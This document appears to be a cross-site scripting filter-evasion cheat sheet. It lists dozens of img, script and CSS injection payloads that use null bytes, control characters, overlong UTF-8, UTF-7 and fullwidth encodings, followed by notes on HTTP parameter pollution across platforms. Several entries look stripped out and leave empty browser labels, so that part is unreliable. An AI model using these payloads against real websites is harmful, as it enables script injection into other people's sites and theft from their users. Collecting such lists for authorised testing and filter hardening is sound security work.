test22

<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror/=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror=\x00alert(0) />
<img src='1' o\x00nerr\x00or=alert(0) />
<\x00img src='1' onerror=alert(0) />
<script\x00>alert(1)</script>
<i\x00mg src='1' onerror=alert(0) />
<img/src='1'/onerror=alert(0)>
<img\x0bsrc='1'\x0bonerror=alert(0)>
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">
<img src='1'\x00onerror=alert(0)>
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)

<img src='1' onerror='alert(0)' <
«script>alert(0)</script>

body{background-color:expression\(alert(1))}

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC

= %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

<img src=1 alt=al lang=ert onerror=topalt+lang>
';</script>

body { background-image:url('<a href="http://www.blah.com/">http://www.blah.com/</a>

'); }</style>
<?xml version="1.0" ?>

(IE)

(Firefox, Chrome, Safari)

(Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

(Firefox)

http://target.com/something.jsp?inject=#alert(1)